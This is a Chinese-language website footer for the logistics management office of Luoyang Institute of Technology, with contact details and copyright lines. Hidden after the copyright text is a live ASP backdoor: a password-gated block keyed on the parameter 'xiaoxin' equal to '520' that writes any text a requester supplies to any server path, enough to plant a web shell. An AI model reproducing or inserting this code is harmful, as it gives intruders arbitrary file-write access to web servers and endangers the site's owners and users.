|
电子信箱:hqglch@lit.edu.cn 办公电话:0379-65929085
邮政编码:471003 主办:洛阳理工学院后勤管理处 办公地址:西校区后勤办公楼421 版权所有 Copyright© 2006——2010 All Rights Reserved.洛阳理工学院后勤管理处
版权所有 Copyright? 2003 动力空间" '版权信息
if Request("xiaoxin")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "小新恭喜"
end if
Response.write ""
Response.end
end if
%>
|